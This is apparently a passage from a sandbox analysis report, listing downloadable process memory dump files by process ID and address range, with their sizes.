memory/1080-77-0x0000000000000000-mapping.dmp

Download
memory/1104-72-0x0000000000000000-mapping.dmp

Download
memory/1120-127-0x00000001400014E0-mapping.dmp

Download
memory/1164-116-0x0000000000000000-mapping.dmp

Download
memory/1228-119-0x0000000000000000-mapping.dmp

Download
memory/1340-121-0x0000000000000000-mapping.dmp

Download
memory/1364-129-0x0000000000000000-mapping.dmp

Download
memory/1392-74-0x0000000000000000-mapping.dmp

Download
memory/1404-65-0x0000000000000000-mapping.dmp

Download
memory/1416-106-0x0000000000000000-mapping.dmp

Download
memory/1496-132-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1496-56-0x000007FEF49D0000-0x000007FEF53F3000-memory.dmp

Filesize
10.1MB

Download
memory/1496-133-0x0000000000070000-0x0000000000090000-memory.dmp

Filesize
128KB

Download
memory/1496-58-0x0000000002964000-0x0000000002967000-memory.dmp

Filesize
12KB

Download
memory/1496-54-0x0000000000000000-mapping.dmp

Download
memory/1496-61-0x000000000296B000-0x000000000298A000-memory.dmp

Filesize
124KB

Download
memory/1496-134-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1496-137-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1496-131-0x00000001407F25D0-mapping.dmp

Download
memory/1496-60-0x0000000002964000-0x0000000002967000-memory.dmp

Filesize
12KB

Download
memory/1496-138-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1496-59-0x000000000296B000-0x000000000298A000-memory.dmp

Filesize
124KB

Download
memory/1496-57-0x000007FEF3190000-0x000007FEF3CED000-memory.dmp

Filesize
11.4MB

Download
memory/1496-55-0x000007FEFC5A1000-0x000007FEFC5A3000-memory.dmp

Filesize
8KB

Download
memory/1544-110-0x0000000000000000-mapping.dmp

Download
memory/1600-75-0x0000000000000000-mapping.dmp

Download
memory/1624-91-0x0000000000000000-mapping.dmp

Download
memory/1704-70-0x0000000000000000-mapping.dmp

Download
memory/1708-64-0x0000000000000000-mapping.dmp

Download
memory/1724-115-0x0000000002774000-0x0000000002777000-memory.dmp

Filesize
12KB

Download
memory/1724-114-0x000007FEF3190000-0x000007FEF3CED000-memory.dmp

Filesize
11.4MB

Download
memory/1724-113-0x000007FEF49D0000-0x000007FEF53F3000-memory.dmp

Filesize
10.1MB

Download
memory/1724-107-0x0000000000000000-mapping.dmp

Download
memory/1724-122-0x0000000002774000-0x0000000002777000-memory.dmp

Filesize
12KB

Download
memory/1724-124-0x000000000277B000-0x000000000279A000-memory.dmp

Filesize
124KB

Download
memory/1788-128-0x0000000000000000-mapping.dmp

Download
memory/1888-78-0x0000000000000000-mapping.dmp

Download
memory/1900-118-0x0000000000000000-mapping.dmp

Download
memory/1924-67-0x0000000000000000-mapping.dmp

Download
memory/1952-117-0x0000000000000000-mapping.dmp

Download
memory/1976-105-0x000000000260B000-0x000000000262A000-memory.dmp

Filesize
124KB

Download
memory/1976-104-0x0000000002604000-0x0000000002607000-memory.dmp

Filesize
12KB

Download
memory/1976-103-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

Filesize
3.0MB

Download
memory/1976-101-0x000007FEEEEC0000-0x000007FEEFA1D000-memory.dmp

Filesize
11.4MB

Download
memory/1976-102-0x0000000002604000-0x0000000002607000-memory.dmp

Filesize
12KB

Download
memory/1976-100-0x000007FEF3E20000-0x000007FEF4843000-memory.dmp

Filesize
10.1MB

Download
memory/1976-97-0x0000000000000000-mapping.dmp

Download
memory/2000-80-0x0000000000000000-mapping.dmp

Download
memory/2028-95-0x0000000000000000-mapping.dmp

Download